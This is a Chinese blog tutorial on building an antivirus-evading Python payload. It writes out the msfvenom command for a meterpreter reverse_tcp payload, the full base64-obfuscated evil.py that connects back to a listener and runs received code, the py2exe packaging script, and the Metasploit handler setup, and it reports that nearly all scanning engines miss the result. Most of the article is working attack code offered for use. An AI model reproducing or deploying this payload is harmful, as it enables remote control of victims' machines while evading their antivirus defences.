使用Python进行防病毒免杀解析


Posted in Python onDecember 13, 2019

很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?

打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

使用Python进行防病毒免杀解析

evil.py 代码如下:

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows,同时创建一个setup.py文件:

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法运行 evil.py,生成可执行文件。

python ./setup.py py2exe

使用Python进行防病毒免杀解析

0x03 设置监听端口

Kali 运行Metasploit,设置监听:

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中运行evil.exe,获得一个meterpreter的会话

使用Python进行防病毒免杀解析

0x04 免杀验证

确认生成的exe文件可正常工作,接下来对evil.exe进行在线病毒扫描,以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

使用Python进行防病毒免杀解析

扫描结果:47款杀毒引擎中,只有一个引擎报毒,主流的杀毒软件全部绕过。

网站地址: http://www.virscan.org 

参考文章:

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

总结

以上所述是小编给大家介绍的使用Python进行防病毒免杀,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!

Python 相关文章推荐
python使用paramiko模块实现ssh远程登陆上传文件并执行
Jan 27 Python
Python使用MySQLdb for Python操作数据库教程
Oct 11 Python
Python中__new__与__init__方法的区别详解
May 04 Python
Python基于sftp及rsa密匙实现远程拷贝文件的方法
Sep 21 Python
python3之模块psutil系统性能信息使用
May 30 Python
Python3.7中安装openCV库的方法
Jul 11 Python
使用python实现抓取腾讯视频所有电影的爬虫
Apr 15 Python
django 控制页面跳转的例子
Aug 06 Python
python爬虫爬取监控教务系统的思路详解
Jan 08 Python
python计算auc的方法
Sep 09 Python
详解Python中的文件操作
Jan 14 Python
python游戏开发之pygame实现接球小游戏
Apr 22 Python
python 使用shutil复制图片的例子
Dec 13 #Python
基于python traceback实现异常的获取与处理
Dec 13 #Python
python 实现批量替换文本中的某部分内容
Dec 13 #Python
django多种支付、并发订单处理实例代码
Dec 13 #Python
Python+OpenCV+图片旋转并用原底色填充新四角的例子
Dec 12 #Python
Python+OpenCV 实现图片无损旋转90°且无黑边
Dec 12 #Python
使用python去除图片白色像素的实例
Dec 12 #Python
You might like
让PHP支持页面回退的两种方法
2008/01/10 PHP
PHP中基于ts与nts版本- vc6和vc9编译版本的区别详解
2013/04/26 PHP
phpmyadmin config.inc.php配置示例
2013/08/27 PHP
Laravel 5.5 实现禁用用户注册示例
2019/10/24 PHP
Javascript 的addEventListener()及attachEvent()区别分析
2009/05/21 Javascript
Javascript和HTML5利用canvas构建Web五子棋游戏实现算法
2013/07/17 Javascript
树结构之JavaScript
2017/01/24 Javascript
详解如何让Express支持async/await
2017/10/09 Javascript
Vue.js实现列表清单的操作方法
2017/11/15 Javascript
深入了解JavaScript词法作用域
2020/07/29 Javascript
纯js+css实现在线时钟
2020/08/18 Javascript
[15:57]教你分分钟做大人:斧王
2014/10/30 DOTA
Python中用Ctrl+C终止多线程程序的问题解决
2013/03/30 Python
简单使用Python自动生成文章
2014/12/25 Python
Python和GO语言实现的消息摘要算法示例
2015/03/10 Python
详解Python2.x中对Unicode编码的使用
2015/04/03 Python
Flask数据库迁移简单介绍
2017/10/24 Python
Python实现读取Properties配置文件的方法
2018/03/29 Python
详解基于django实现的webssh简单例子
2018/07/17 Python
python try except 捕获所有异常的实例
2018/10/18 Python
浅谈ROC曲线的最佳阈值如何选取
2020/02/28 Python
PyQT5 实现快捷键复制表格数据的方法示例
2020/06/19 Python
结合CSS3的布局新特征谈谈常见布局方法
2016/01/22 HTML / CSS
Mio Skincare中文官网:肌肤和身体护理
2016/10/26 全球购物
亚洲领先的旅游体验市场:Voyagin
2019/11/23 全球购物
分解成质因数(如435234=251*17*17*3*2,据说是华为笔试题)
2014/07/16 面试题
财务会计实习报告体会
2013/12/20 职场文书
小学开学寄语
2014/01/19 职场文书
服装设计师职业生涯规划范文
2014/02/28 职场文书
森马旗舰店双十一营销方案
2014/09/29 职场文书
职工年度考核评语
2014/12/31 职场文书
2015年导购员工作总结
2015/04/25 职场文书
廉洁自律承诺书范文
2015/04/28 职场文书
反腐倡廉主题教育活动总结
2015/05/07 职场文书
最美乡村教师观后感
2015/06/11 职场文书
MySQL数据库压缩版本安装与配置详细教程
2021/05/21 MySQL